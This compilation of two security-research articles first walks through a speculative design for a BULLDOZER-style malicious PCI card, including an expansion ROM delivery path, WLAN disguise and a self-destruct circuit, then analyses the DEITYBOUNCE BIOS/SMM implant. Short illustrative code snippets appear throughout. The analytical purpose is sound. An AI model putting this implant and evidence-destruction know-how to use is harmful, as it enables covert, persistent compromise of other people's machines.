If you’re not familiar with XROMBAR, refer to my Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) for the details. Now, let’s focus on the last step: customizing the hardware required for the PCI expansion ROM to work. It’s the SMT310Q carrier board that implements the PCI bus protocol support in the SMT8096 PCI SDR development kit. Therefore, we are going to scrutinize the SMT310Q carrier board to find out how we can implement the PCI expansion ROM on it. We start with the board block diagram. Figure 6 shows the SMT310Q block diagram. The block diagram is not a physical block diagram of the board. Instead, it’s a logical block diagram depicting the logical interconnections between the board components. Figure 6 SMT310Q Block Diagram. Courtesy: Sundance Multiprocessor Technology Ltd. Figure 6 shows blocks marked as TIM, i.e. TIM 1, TIM 2 and so on. TIM is an abbreviation for Texas Instruments Module. TIM is a standard interconnection between boards using a Texas Instruments DSP chip and other board(s). I couldn’t find the latest version of the TIM specifications. However, you can find TIM version 1.01 on the net. Although the name implies that a DSP should be connected via this interconnect, in reality anything that conforms to the specifications can be connected. It’s important to know about TIM, because we are going to use it to “wire” the PCI expansion ROM and also to “wire” the NVRAM into the SMT310Q carrier board later. Figure 6 shows that the QuickLogic V363EPC PCI bridge—marked as V3 PCI Bridge—connects to the TIMs via the 32-bit Global Bus. The 32-bit Global Bus corresponds to the LAD[31:0] multiplexed address and data lines in the QuickLogic V363EPC datasheet. This means the logical and physical connection from the QuickLogic V363EPC to the PCI expansion ROM and the NVRAM in our design will be based on the Global Bus. 
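Whatever chip ends up storing GINSU, the image it holds must follow the legacy PCI expansion ROM layout, or the motherboard BIOS will ignore it. Below is a minimal sketch of the structural checks a BIOS performs on a legacy x86 option ROM image, per the PCI specification: the 0x55 0xAA signature, the size byte at offset 2 (in 512-byte units), the pointer to the “PCIR” data structure at offset 18h, and a byte checksum of zero over the image. The test buffer is synthetic.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Minimal validity check of a legacy PCI expansion ROM image, per the
 * PCI spec: signature, size byte, "PCIR" data structure pointer, and
 * a zero byte checksum over the whole image. */
static int rom_image_valid(const uint8_t *rom, size_t len)
{
    if (len < 0x1A || rom[0] != 0x55 || rom[1] != 0xAA)
        return 0;
    size_t image_len = (size_t)rom[2] * 512;   /* size in 512B units */
    if (image_len == 0 || image_len > len)
        return 0;
    uint16_t pcir_off = (uint16_t)(rom[0x18] | (rom[0x19] << 8));
    if (pcir_off + 4 > image_len ||
        rom[pcir_off]     != 'P' || rom[pcir_off + 1] != 'C' ||
        rom[pcir_off + 2] != 'I' || rom[pcir_off + 3] != 'R')
        return 0;
    uint8_t sum = 0;                           /* must checksum to 0 */
    for (size_t i = 0; i < image_len; i++)
        sum = (uint8_t)(sum + rom[i]);
    return sum == 0;
}
```

A malicious image such as GINSU must pass exactly these checks to be dispatched by the BIOS, which is why the flash ROM behind the XROMBAR has to hold a well-formed image, not arbitrary code.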
Now, let’s look at how the QuickLogic V363EPC exposes devices wired to the TIMs to the host x86/x64 CPU address space. The QuickLogic V363EPC uses so-called “data transfer apertures” to map devices connected through LAD[31:0] into the host x86/x64 CPU address space. These apertures are basically address ranges claimed by the PCI Base Address Registers (BARs) in the QuickLogic V363EPC. The QuickLogic V363EPC datasheet uses a different naming scheme for the PCI BARs. Figure 7 shows the PCI BARs marked as PCI_BASEx registers. The PCI_MAPx registers in Figure 7 control the amount of memory or I/O range claimed by the PCI_BASEx registers. If you are new to PCI configuration space registers, my Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) has a deeper explanation of the subject. You can compare the “standard” PCI configuration space registers explained there with the ones shown in Figure 7. Figure 7 QuickLogic V363EPC PCI configuration registers. Courtesy: QuickLogic V363EPC datasheet. Let’s look deeper into the “data transfer aperture” in the QuickLogic V363EPC. The “aperture” is basically address remapping logic, i.e. it remaps addresses from the host x86/x64 CPU address space into the local address space of the SMT310Q PCI add-in board. If you’re new to address remapping, you can read a sample of the concept in System Address Map Initialization in x86/x64 Architecture Part 2: PCI Express-Based Systems - InfoSec Institute. Figure 8 shows a simplified block diagram of the QuickLogic V363EPC aperture logic (address remapper). Figure 8 QuickLogic V363EPC Aperture Logic Figure 8 shows that the QuickLogic V363EPC claims two different ranges in the PCI address space of the host x86/x64 CPU address space. We are only going to delve into the first range, claimed by the PCI_BASE0 register. 
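Functionally, such an aperture is just address translation: an access that falls inside the window claimed by a BAR is forwarded to the local bus at a programmed local base plus the offset within the window. The sketch below is illustrative only; the flat function interface and parameter names are my simplifications, not the V363EPC’s actual programming model.

```c
#include <assert.h>
#include <stdint.h>

/* Illustrative model of a PCI-to-Local-bus aperture: if the host
 * address falls inside the window claimed by the BAR, the bridge
 * forwards it to (local_base + offset-within-window); otherwise the
 * bridge does not claim the transaction. */
static int aperture_remap(uint32_t host_addr,
                          uint32_t bar_base, uint32_t size,
                          uint32_t local_base, uint32_t *local_addr)
{
    if (host_addr < bar_base || host_addr >= bar_base + size)
        return 0;                  /* transaction not claimed */
    *local_addr = local_base + (host_addr - bar_base);
    return 1;
}
```

This is the mechanism the datasheet excerpt below describes for PCI-to-Local aperture 0, whose decoder is shared with the expansion ROM window.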
This is the relevant excerpt from the QuickLogic V363EPC datasheet: “4.1.8 Special Function Modes for PCI-to-Local Bus Apertures PCI-to-Local bus aperture 0 shares some functionality with the expansion ROM base aperture. The address decoder for PCI-to-Local aperture 0 is shared with the expansion ROM base register. When the expansion ROM base is enabled, the decoder will only bridge accesses within the ROM window. When the ROM is disabled, PCI-to-Local bus aperture 0 will function as described above. Typically, the expansion ROM is used only during BIOS boot, if at all. The expansion ROM base register can be completely disabled via software.” The excerpt above clarifies the PCI expansion ROM mapping. Basically, it says that when the PCI expansion ROM chip mapping is enabled via the XROMBAR register, the aperture will be used only for accesses to the PCI expansion ROM chip. No other chip can claim transactions via the aperture. The XROMBAR in the QuickLogic V363EPC chip must be enabled in order to support the PCI expansion ROM. This is a somewhat involved task. First, we must find the default XROMBAR register value in the chip. The XROMBAR is named the PCI_ROM register in the QuickLogic V363EPC datasheet, as you can see in Figure 7. The datasheet mentions that the PCI_ROM (XROMBAR) default value upon power-on is 00h. This means the XROMBAR is disabled, because its least significant bit is zero—per the PCI specification. However, this is not a problem, as the default values of the PCI configuration space registers in the QuickLogic V363EPC PCI bridge can be made configurable. There are hardware “straps” that control the default values of the PCI configuration space registers in the QuickLogic V363EPC. One of the “strap” configurations instructs the QuickLogic V363EPC to “download” its PCI configuration space register default values from an external serial EEPROM chip. Pay attention to the fact that this serial EEPROM chip is an entirely different chip from the PCI expansion ROM chip. 
Figure 9 shows the “straps” option for the V363EPC PCI configuration space registers. Figure 9 QuickLogic V363EPC PCI Configuration Space Registers Default Values Initialization “straps” Option. Courtesy: QuickLogic V363EPC datasheet. Figure 9 shows there are two “straps” that control the default value initialization in the V363EPC, i.e. SDA and SCL. Both of these “straps” are actually pins on the V363EPC chip. As you can see, when SDA and SCL are connected to a serial EEPROM, the PCI configuration space register default values will be initialized from the serial EEPROM. The SDA and SCL pins adhere to the I2C protocol. I2C is a serial protocol that connects microcontrollers and other peripheral chips in a cost-efficient manner, i.e. with as small a number of pins as possible, because pins and traces on a circuit board are costly to design and manufacture. SDA stands for Serial Data and SCL for Serial Clock. Figure 10 V363EPC to serial EEPROM connection circuit schematic. Courtesy: QuickLogic V363EPC datasheet. Figure 10 shows the circuit schematic for loading the default PCI configuration space register values from EEPROM. Now we know how to “force” the V363EPC PCI configuration space register default values to our liking. Once the pull-up resistors are set up to configure the QuickLogic V363EPC to use a serial EEPROM, the QuickLogic V363EPC PCI configuration space register default values are stored in the serial EEPROM and automatically loaded to the QuickLogic V363EPC PCI configuration space after power-on or PCI bus reset, prior to PCI bus initialization by the motherboard BIOS. This means we can configure the XROMBAR default value via the contents of the serial EEPROM. Therefore, the PCI_ROM (XROMBAR) can be enabled. Another PCI configuration register to take into account is the PCI_MAP0 register. The PCI_MAP0 register—highlighted in a red box in Figure 7—controls whether the PCI_ROM register is enabled or not. 
It also controls the size of the ROM chip to be exposed through the PCI_ROM register. Let’s look into the details of the PCI_MAP0 register. Figure 11 shows the relevant excerpt for the PCI_MAP0 register from the QuickLogic V363EPC datasheet. Figure 11 PCI_MAP0 register description. Courtesy: QuickLogic V363EPC datasheet Figure 11 shows the ROM_SIZE bits in the PCI_MAP0 register highlighted in yellow. These bits determine the size of the PCI expansion ROM to be decoded by the QuickLogic V363EPC. As you can see, the chip supports a PCI expansion ROM with a size of up to 64KB. Perhaps this size is not up to what a malicious PCI expansion ROM payload requires. However, malicious PCI expansion ROM code can load additional code from other memory storage on the PCI add-in card when the ROM code executes. You must configure the ROM_SIZE bits’ default value to the correct value according to your hardware design. Entries in Figure 11 that have their “type” column marked as FRW mean that the default values of those bits are determined by the contents of the serial EEPROM, if serial EEPROM support is activated via the SDA and SCL “straps”. Therefore, all you need to do is place the correct value in the serial EEPROM to configure their default values. There is one more PCI configuration space register to take into account to implement the BULLDOZER hardware: the Class Code register. The PCI Class Code register consists of three sub-parts: the base class, sub-class, and interface. Figure 12 shows the class code selections for the PCI Wireless Controller class of devices. Figure 12 PCI Wireless Controller Class Code As you see in Figure 12, we have to set the class code in our BULLDOZER chip design to base class 0Dh, sub-class 21h, and interface 00h to make it masquerade as a PCI WLAN chipset that conforms to WLAN protocol revision B. Figure 7 shows the location of the Class Code register in the QuickLogic V363EPC chip. 
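The two EEPROM-initialized items discussed above, the ROM mapping control and the class code, can be modeled as a small table of register defaults that the bridge loads at power-on. This is a hypothetical sketch: the real EEPROM byte layout is defined by the V363EPC datasheet and not reproduced here. Only the class code encoding (bits 31-8 of the dword at offset 08h) and the XROMBAR offset (30h for a type-0 header) come from the PCI specification; the values in the test are illustrative.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical model of serial-EEPROM-supplied defaults: a list of
 * "register offset -> default value" pairs applied to a 256-byte PCI
 * configuration space image (64 dwords) at power-on. */
struct cfg_default { uint8_t offset; uint32_t value; };

static void apply_eeprom_defaults(uint32_t cfg[64],
                                  const struct cfg_default *d, int n)
{
    for (int i = 0; i < n; i++)
        cfg[d[i].offset / 4] = d[i].value;
}

/* Dword at config offset 0x08: class code in bits 31-8, revision ID
 * in bits 7-0.  Base 0x0D / sub 0x21 / interface 0x00 is the wireless
 * controller class for 802.11b mentioned in the text. */
static uint32_t class_code_dword(uint8_t base, uint8_t sub,
                                 uint8_t prog_if, uint8_t rev)
{
    return ((uint32_t)base << 24) | ((uint32_t)sub << 16) |
           ((uint32_t)prog_if << 8) | rev;
}
```

With the XROMBAR default value’s least significant bit set, the expansion ROM mapping comes up enabled before the BIOS ever touches the device.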
All you need to do is store the correct class code in the serial EEPROM used to initialize the contents of the QuickLogic V363EPC PCI configuration space registers. This way our BULLDOZER design conforms nicely to the PCI specification. At this point we can control the QuickLogic V363EPC PCI configuration space register default values. We have also gained the knowledge required to map a PCI expansion ROM chip into the host x86/x64 CPU address space. The thing that’s left to design is the way to store the BULLDOZER configuration. Let’s assume that we store the BULLDOZER configuration in an NVRAM chip. We can connect the NVRAM chip to the SMT310Q PCI carrier board via the TIM interface, just like the PCI expansion ROM chip. The process of designing the interconnection is similar to what we have done for the PCI expansion ROM chip, except that we must expose the chip to code running on the host x86/x64 CPU via a different aperture, for example by using PCI-to-Local Aperture 1. Now we know everything we need to implement the BULLDOZER hardware. There is one more thing left though: the “kill switch”, i.e. the hardware to “destroy” evidence, just in case an operation involving the BULLDOZER hardware gets botched. Implementing the “Kill Switch”: Military-Grade Electronics Speculation It’s standard procedure to have a kill switch in military electronics. A kill switch is a mechanism that enables you to destroy hardware or software remotely, rendering it beyond repair. The destruction must be sufficient to prevent the software or hardware from being analyzed by anyone. There are several reasons to have a kill switch. First, you don’t want an adversary to find evidence to implicate you in the event that an operation fails. Second, you don’t want your adversary to learn your highly valued technology. There are other strategic reasons to have a kill switch, but those two suffice to conduct research into implementing a kill switch in BULLDOZER. 
BULLDOZER is hardware that consists of several electronic chips bound together on a circuit board. Therefore, what we need to know is the technique to destroy the key chips on a circuit board at a moment’s notice. Surely, we turn to physics to solve this problem. From my experience as an overclocker in the past, I know very well that you can physically destroy a chip by inducing electromigration in it. From Wikipedia: Electromigration is the transport of material caused by the gradual movement of the ions in a conductor due to the momentum transfer between conducting electrons and diffusing metal atoms. Electromigration in simple terms means: the breakdown of the metal interconnect inside a semiconductor chip due to the migration of the metal ions that make up the interconnect to an unwanted location. To put it simply, electromigration causes the metal interconnect inside the chip to be destroyed, akin to—but different from—corrosion in metal subjected to a harsh environment. In many cases, electromigration can cause unwanted short circuits inside the chip. Figure 13 shows an electromigration illustration. As you can see, the copper ion (Cu+) moves in the opposite direction from the electrons. The copper ion was previously part of the copper interconnect inside the semiconductor chip. The copper ion “migrates” to a different part of the chip due to electromigration. Figure 13 Electromigration. Courtesy: Wikipedia There are many ways to induce electromigration in a semiconductor chip. However, I will focus on only one of them: overvoltage. You can induce electromigration by feeding excess voltage into a chip or into certain parts of a chip. The problem now is designing a circuit to overvoltage only a certain part of a semiconductor chip. Let’s assume that we don’t want to overvoltage the entire chip, because we have previously assumed that BULLDOZER masquerades as a PCI WLAN chip. 
Therefore, you only want to destroy the part that implements the custom stealthy wireless communication protocol, not the part that implements the WLAN protocol. If the WLAN function were suddenly destroyed, it would raise suspicion in the target. One of the ways to create a large voltage inside an electronic circuit is by using a so-called “charge pump”. A charge pump is a DC-to-DC converter that uses capacitors as energy storage elements to create either a higher or lower voltage power source. As far as I know, it’s quite trivial to implement a capacitor in a semiconductor chip. Therefore, using a charge pump to create our required overvoltage source should be achievable. Figure 14 shows one of the charge pump designs. Figure 14 Dickson Charge Pump Design with MOSFETs. Courtesy: Wikipedia Vin in Figure 14 is the source voltage that’s going to be “multiplied”. Vo in Figure 14 is the output voltage, i.e. a multiple of the input voltage. As you can see, we can create a voltage several times higher than the source voltage inside a semiconductor chip by using a charge pump. I have used a charge pump in one of my projects in the past. It was made of discrete electronic parts. The output voltage is usually not an exact multiple of the input voltage, due to losses in the “multiplier” circuit. I suspect that a charge pump implemented inside a semiconductor chip provides a better “voltage multiplication” function than discrete ones. At this point, we have all the things needed to create a kill switch. Your circuit design only needs to incorporate the charge pump. You can use a control register in the FPGA to feed the logic that decides whether to activate the charge pump or not. You can devise certain byte patterns to turn on the charge pump and destroy your prized malicious logic parts in the PCI add-in card. There are surely many ways to implement a kill switch. Using a charge pump is only one of the many. 
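As a rough sanity check of the idea, the classic first-order estimate for an N-stage Dickson pump is that each stage adds the clock amplitude minus one threshold-voltage drop, and the output diode costs one more drop. The formula and the numbers below are textbook first-order values, ignoring load and parasitics; real on-chip pumps deliver less.

```c
#include <assert.h>

/* First-order output of an N-stage Dickson charge pump driven by a
 * clock of amplitude v_clk: each stage adds (v_clk - v_t) and the
 * output diode/MOSFET costs one more threshold drop v_t.  Losses
 * under load are ignored. */
static double dickson_vout(double v_in, double v_clk, double v_t, int stages)
{
    return v_in + stages * (v_clk - v_t) - v_t;
}
```

For example, a 4-stage pump fed from 3.3V with a 3.3V clock and 0.6V threshold drops already reaches roughly 13.5V on paper, which is comfortably into the overvoltage territory needed to stress a part of a chip designed for 3.3V.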
I present it here merely out of my “intuition” for solving the problem of creating a kill switch. The military surely has more tricks up their sleeve. BULLDOZER Implementation Recap We have gathered all the techniques needed to build “BULLDOZER-equivalent” hardware in the previous sections. Surely, this is based on our earlier assumption that BULLDOZER masquerades as a PCI WLAN add-in card. Now, let’s compose a recap, building on those newly acquired techniques and our assumptions from the beginning of this article. The recap is as follows: BULLDOZER is a malicious PCI add-in card that masquerades as a PCI WLAN card. It implements the correct PCI class code to masquerade as a PCI WLAN card. BULLDOZER implements a PCI expansion ROM because that’s the delivery mechanism to “inject” GINSU malware code into the x86/x64 host system. BULLDOZER uses SDR to implement a stealthy wireless communication protocol to communicate with OMNIGAT. BULLDOZER was designed using SDR FPGA prototyping tools before being fabricated as an ASIC in the NSA’s semiconductor fab. The NSA could use either Altera, Xilinx, or internally developed FPGA prototyping tools. BULLDOZER exposes the PCI expansion ROM chip via the XROMBAR in its PCI configuration space. The size of the PCI expansion ROM chip exposed through the XROMBAR is limited to 16MB, per the PCI specification. However, one can devise “custom” code to download additional content from the BULLDOZER PCI add-in card to system RAM as needed during PCI expansion ROM execution. 16MB is already a large space for malicious firmware-level code, though. It’s not yet clear whether one desktop PC implanted with BULLDOZER is enough or whether more are required to make it work. However, the GINSU extended concept of operation implies that one BULLDOZER-implanted desktop PC is enough. A possibility not covered in this article is that the NSA licensed the design for the non-stealthy PCI WLAN controller part of BULLDOZER from commercial vendors such as Broadcom or Ralink. 
This could shorten the BULLDOZER design and implementation timeframe by quite a lot. Another possibility not covered here is the BULLDOZER PCI chip being a multifunction PCI chip. The PCI bus protocol supports a single physical PCI controller chip that contains multiple functions. We don’t delve into that possibility here, though. As for the chip marking on the BULLDOZER PCI WLAN controller chip, it could easily be carried out by the NSA fab. Well, with the right tools, anyone can even print the “I Love You” phrase as a legitimate-looking chip marking, like the one shown in Andrew “Bunnie” Huang’s blog: Qué romántico! « bunnie's blog. That is all for our BULLDOZER implementation recap. It’s quite a long journey, but we now have a clearer picture of the BULLDOZER hardware implementation. Closing Thoughts: BULLDOZER Evolution Given that BULLDOZER was fielded almost six years ago, the present-day BULLDOZER coming out of the NSA’s fab must have evolved, perhaps into a PCI Express add-in card. It’s quite trivial to migrate the BULLDOZER design explained in this article to PCI Express (PCIe), though. Therefore, the NSA shouldn’t have any difficulty carrying out the protocol conversion. PCIe is compatible with PCI at the logical level of the protocol. Therefore, most of the non-physical design can be carried over from the PCI version of the BULLDOZER design explained here. We should look into the “evolved” BULLDOZER in the future. By Darmawan Salihun|February 14th, 2014 Source: NSA Backdoor Part 2, BULLDOZER: And, Learn How to DIY a NSA Hardware Implant - InfoSec Institute
-
NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE This article is the first part of a series on NSA BIOS backdoor internals. Before we begin, I’d like to point out why these pieces of malware are classified as “god mode.” First, most of them use an internal (NSA) codename in the realm of “gods,” such as DEITYBOUNCE, GODSURGE, etc. Second, they have capabilities similar to “god mode” cheats in video games, which make the player using them close to invincible. This is the case with this type of malware because it is very hard to detect and remove, even with the most sophisticated anti-malware tools, during its possible deployment timeframe. This part of the series focuses on the DEITYBOUNCE malware described in the NSA ANT server document, leaked by Edward Snowden. The analysis presented in this article is based on the technical implications of the information provided by the document. The document lacks many technical specifics, but based on the BIOS technology of the day DEITYBOUNCE became operational, we can infer some technically sound hypotheses—or conclusions, if you prefer. Introduction to DEITYBOUNCE Malware DEITYBOUNCE operates as part of the system shown in Figure 1. Figure 1 shows several peculiar terms, such as ROC, SNEAKERNET, etc. Some of these terms are used internally by the NSA. ROC is an abbreviation for Remote Operation Center. The ROC acts as the NSA’s point of control over the target system; it’s located outside NSA headquarters. SNEAKERNET is a fabulous term for the physical delivery of data, i.e., using humans to move data between computers by carrying removable media such as magnetic tape, floppy disks, compact discs, USB flash drives (thumb drives, USB sticks), or external hard drives from one computer to another. Figure 1 DEITYBOUNCE Extended Concept of Operation Figure 1 shows DEITYBOUNCE targeting the machines marked with a red dot. 
DEITYBOUNCE itself is not installed on those machines, because DEITYBOUNCE targets the Dell PowerEdge 1850/2850/1950/2950 RAID server series with BIOS versions A02, A05, A06, 1.1.0, 1.2.0, or 1.3.7, not laptops or desktops/workstations. This means DEITYBOUNCE is installed on servers accessed by the laptops or desktops/workstations marked with red dots. The red dots also mean that those systems could act as "jump hosts" to implant DEITYBOUNCE in the target servers. Figure 1 also shows the presence of ARKSTREAM. ARKSTREAM is basically a malware dropper that combines BIOS-flashing and payload-dropping functions. ARKSTREAM can install DEITYBOUNCE on the target server either via remotely controlled exploits (network infection) or via USB thumb drive infection. This infection method is, in a way, very similar to the STUXNET malware dropper. ARKSTREAM installs DEITYBOUNCE via BIOS flashing, i.e., replacing the PowerEdge server BIOS with one that is "infected" by the DEITYBOUNCE malware. The NSA ANT server document doesn't divulge minute details explaining DEITYBOUNCE's "technical context" of operation. However, we can infer parts of that "technical context" from the DEITYBOUNCE technical requirements mentioned in the document. These are the important technical details revealed by the NSA ANT server document:

- DEITYBOUNCE provides software application persistence on Dell PowerEdge servers by exploiting the motherboard BIOS and utilizing system management mode (SMM) to gain periodic execution while the operating system (OS) loads.
- DEITYBOUNCE supports multiprocessor systems with RAID hardware and Microsoft Windows 2000, XP, and 2003 Server.
- Once implanted, DEITYBOUNCE's frequency of execution (dropping the payload) is configurable and will occur when the target machine powers on.

In later sections, we will look into the DEITYBOUNCE malware architecture in more detail, based on these technical details. These details provide a lot more valuable hints than you might think.
But before that, you need some important background knowledge.

A Closer Look at Dell PowerEdge Hardware

Let's start with the first item of background knowledge. In the previous section, we learned that DEITYBOUNCE targets the Dell PowerEdge 1850/2850/1950/2950 RAID server series. Therefore, we need to look into these servers more closely to understand the DEITYBOUNCE execution environment. One can download the relevant server specifications from these links:

Dell PowerEdge 1950 specification: http://www.dell.com/downloads/global/products/pedge/en/1950_specs.pdf
Dell PowerEdge 2950 specification: http://www.dell.com/downloads/global/products/pedge/en/2950_specs.pdf

The server specifications are rather ordinary. However, if you look more closely at the storage options of both server types, you'll notice the option to use a RAID controller in both: a PERC 5/i, PERC 4e/DC, or PERC 5/e. We focus on the RAID controller hardware because the DEITYBOUNCE technical details mention the presence of RAID as one of its hardware "requirements." Now let's move to a more detailed analysis. You can download the user guide for the Dell PERC family of RAID controllers from: ftp://ftp.dell.com/Manuals/Common/dell-perc-4-dc_User's%20Guide_en-us.pdf. Despite the fact that the document is only a user guide, it provides important information, as follows: PERC stands for PowerEdge Expandable RAID Controller. This means the PERC series of RAID controllers are either white-labeled by Dell or developed internally by Dell. There are several types of PERC RAID controllers. The ones with the XX/i moniker are the integrated versions, the XX/SC moniker means the RAID controller is single channel, the XX/DC moniker means the RAID controller is dual channel, and the XXe/XX moniker signifies that the RAID controller uses PCI Express (PCIe) instead of the PCI bus. If the last moniker is missing, it implies that the RAID controller uses PCI, not PCIe.
All PERC variants have 1MB of onboard flash ROM. Mind you, this is not the PowerEdge server motherboard flash ROM but the PERC RAID controller's (exclusive) flash ROM. It's used to initialize and configure the RAID controller. All PERC variants have NVRAM to store their configuration data. The NVRAM is located on the PERC adapter board, except when the PERC is integrated into the motherboard. The PERC RAID controller flash ROM size (1MB) is huge from a firmware code point of view. Therefore, anyone can insert an advanced—read: large in code size—malicious firmware-level module into it. I can't find information on the Dell PowerEdge 1850/2850/1950/2950 BIOS chip size. However, the size of their compressed BIOS files is larger than 570KB. Therefore, it's safe to assume that the motherboard BIOS chip is at least 1MB because, AFAIK, there is no flash ROM chip—used to store BIOS code—with a size between 570KB and 1MB. The closest flash ROM size above 570KB is 1MB. This fact also presents a huge opportunity to place BIOS malware in the motherboard BIOS, in addition to the RAID controller expansion ROM.

Initial Program Loader (IPL) Device Primer

The second item of background knowledge you need pertains to the IPL device. A RAID controller or other storage controller is an attractive victim for firmware malware because they are IPL devices, as per the BIOS Boot Specification. The BIOS Boot Specification and the PCI specification dictate that IPL device firmware must be executed at boot if the IPL device is in use. IPL device firmware is mostly implemented as a PCI expansion ROM. Therefore, IPL device firmware is always executed, assuming the IPL device is in use. This fact opens a path for firmware-level malware to reside in the IPL device firmware, particularly if the malware has to be executed at every boot or on a certain trigger at boot. For more details on IPL device firmware execution, see: https://sites.google.com/site/pinczakko/low-cost-embedded-x86-teaching-tool-2.
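To make this concrete, here is a minimal sketch (Python, illustrative only; the function names are mine) of the legacy PCI expansion ROM header fields a BIOS validates before executing an image: the 0x55AA signature at offset 0, the image size in 512-byte units at offset 2, and the INIT entry point at offset 3, per the PCI firmware specification.

```python
# Minimal sketch of the legacy PCI expansion ROM header checks a BIOS
# performs before far-calling an image. Field offsets follow the PCI
# firmware specification; this is an illustration, not BIOS code.
ROM_SIGNATURE = b"\x55\xAA"  # bytes 0-1 of every legacy expansion ROM

def parse_expansion_rom_header(rom: bytes):
    """Return (size_in_bytes, init_entry_offset) or raise ValueError."""
    if rom[0:2] != ROM_SIGNATURE:
        raise ValueError("not a PCI expansion ROM image")
    size = rom[2] * 512      # offset 2: image size in 512-byte units
    init_offset = 3          # offset 3: entry point the BIOS far-calls
    return size, init_offset

# A fake one-sector ROM image: signature, size byte = 1, then padding.
fake_rom = ROM_SIGNATURE + b"\x01" + b"\x90" * 509
print(parse_expansion_rom_header(fake_rom))  # (512, 3)
```

A BIOS that skips the signature check, or runs the image regardless of whether the device is actually in use (the peculiarity discussed next), gives an "infected" ROM its execution window.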
You need to take a closer look at the boot connection vector (BCV) in the PCI expansion ROM, covered in the article linked above. The system BIOS calls/jumps into the BCV during bootstrap to start the bootloader, which then loads and executes the OS. The BCV is implemented in the PCI expansion ROM of the storage controller device. Therefore, the PERC RAID controller in Dell PowerEdge servers should implement a BCV as well to conform to the BIOS Boot Specification. IPL device PCI expansion ROMs also have a peculiarity: in some BIOS implementations, they are always executed, whether or not the IPL device is being used. The reason is that the BIOS code very probably only checks the PCI device subclass code and interface code in its PCI configuration registers. See the "PCI PnP Expansion ROM Peculiarity" section at https://sites.google.com/site/pinczakko/low-cost-embedded-x86-teaching-tool-2#pci_pnp_rom_peculiarity.

System Management Mode (SMM) Primer

The third item of background knowledge needed to understand DEITYBOUNCE is SMM. A seminal work on SMM malware can be found in the Phrack ezine article "A Real SMM Rootkit: Reversing and Hooking BIOS SMI Handlers." SMI, in this context, means system management interrupt. The Phrack article contains the knowledge required to understand how an SMM rootkit might work. There is one thing that needs to be updated in that Phrack article, though: recent and present-day CPUs no longer use the high segment (HSEG) to store SMM code. Only the top-of-memory segment (TSEG) is used for that purpose. If you're not familiar with HSEG and TSEG, you can refer to System Address Map Initialization in x86/x64 Architecture Part 1: PCI-Based Systems - InfoSec Institute and System Address Map Initialization in x86/x64 Architecture Part 2: PCI Express-Based Systems - InfoSec Institute for details on the HSEG and TSEG locations in the CPU memory space. This means that, for maximum forward compatibility, DEITYBOUNCE very possibly uses only TSEG in its SMM component.
Entering SMM via software SMI in x86/x64 is quite simple. All you need to do is write a certain value to a particular I/O port address. A write transaction to this I/O port is interpreted by the chipset as a request to enter SMM; the chipset therefore sends an SMI signal to the CPU to enter SMM. Certain x86/x64 CPUs directly "trap" this kind of I/O write transaction and interpret it as a request to enter SMM without passing anything to the chipset first. The complete algorithm to enter SMM is as follows:

1. Initialize the DX register with the SMM "activation" port. Usually, the SMM "activation" port is port number 0xB2. However, it could be a different port, depending on the specific CPU and chipset combination; you have to resort to their datasheets for the details.
2. Initialize the AX register with the SMI command value.
3. Enter SMM by writing the AX value to the output port contained in the DX register.

The methods for passing parameters to the SMI handler routine are not covered extensively by the Phrack article, so we will have a look at them here. Some SMM code (an SMI handler) needs to communicate with other BIOS modules or with software running inside the OS. The communication is carried out through parameter passing between the SMM code and code running outside SMM. Parameter passing between a BIOS module and an SMI handler is generally carried out via one of these mechanisms:

Via the global non-volatile storage (GNVS). GNVS is part of the ACPI v4.0 specification and is named ACPI non-volatile storage (NVS) there. However, in some patent descriptions, NVS stands for non-volatile sleeping memory, because the memory region occupied by NVS in RAM stores data that's preserved even if the system is in sleep mode. Either term refers to the same region in RAM, so the discrepancy in naming can be ignored. GNVS or ACPI NVS is part of RAM managed by the ACPI subsystem in the BIOS.
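The three-step SMI entry sequence above is privileged (an I/O port write), so it cannot be demonstrated from a normal process; the toy model below (Python, every name hypothetical) only simulates the dispatch contract the text describes: a write to the assumed activation port 0xB2 hands the AX command value to a registered SMI handler.

```python
# Toy model of software-SMI dispatch: an OUT to the SMI "activation"
# port (0xB2 in the text; chipset-specific in reality) raises an SMI,
# and the handler is selected by the command value that was in AX.
# Pure simulation; real code would be ring-0 assembly, not Python.
SMI_ACTIVATION_PORT = 0xB2

smi_handlers = {}   # command value -> handler function
smi_log = []        # records which commands reached a handler

def register_smi_handler(command, handler):
    smi_handlers[command] = handler

def port_write(port, value):
    """Simulate the chipset trapping an I/O write as an SMI request."""
    if port == SMI_ACTIVATION_PORT and value in smi_handlers:
        smi_handlers[value](value)

# A hypothetical handler, standing in for a DEITYBOUNCE-style routine.
register_smi_handler(0xDB, lambda cmd: smi_log.append(cmd))

# Equivalent of "mov dx, 0B2h / mov ax, 0DBh / out dx, al":
port_write(SMI_ACTIVATION_PORT, 0xDB)
print(smi_log)  # [219] (i.e., 0xDB reached the handler)
```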
GNVS stores various data. It is not managed by the OS, but is reachable by the OS through the ACPI source language (ASL) interface. In Windows, parts of this region are accessible through the Windows Management Instrumentation (WMI) interface.

Via general-purpose registers (GPRs) in the x86/x64 architecture, i.e., RAX/EAX, RBX/EBX, RDX/EDX, etc. In this technique, a physical address pointer is passed via a GPR to the SMI handler code. Because the system state, including the register values, is saved to the "SMM save state," the code in the SMM area (the SMI handlers) is able to read the pointer value. The catch is that both the SMI handler and the code passing the parameters must agree on the "calling convention," i.e., which register(s) to use.

Knowing how parameters are passed between a BIOS module and an SMI handler is important because DEITYBOUNCE uses this mechanism extensively when it runs. We will look into it in more detail in later sections.

Precursor to DEITYBOUNCE Malware Architecture

As with other software, we can infer the DEITYBOUNCE malware architecture from its execution environment. The NSA ANT server document mentions three technical hints, as you can see in the Introduction section. We'll delve into them one by one to uncover the possible DEITYBOUNCE architecture. The need for RAID hardware means that DEITYBOUNCE contains malware implanted in the RAID controller PCI expansion ROM. The RAID controller used in the Dell PowerEdge 1950 server is the PERC 5/i, PERC 4e/DC, or PERC 5/e adapter card. All of these RAID controllers are either PCI or PCI Express (PCIe) RAID controllers. Note that "PCI expansion ROM" here also includes PCIe expansion ROMs, because the two are virtually the same. I have covered PCI expansion ROM malware basics in another article; see Malicious Code Execution in PCI Expansion ROM - InfoSec Institute for the details.
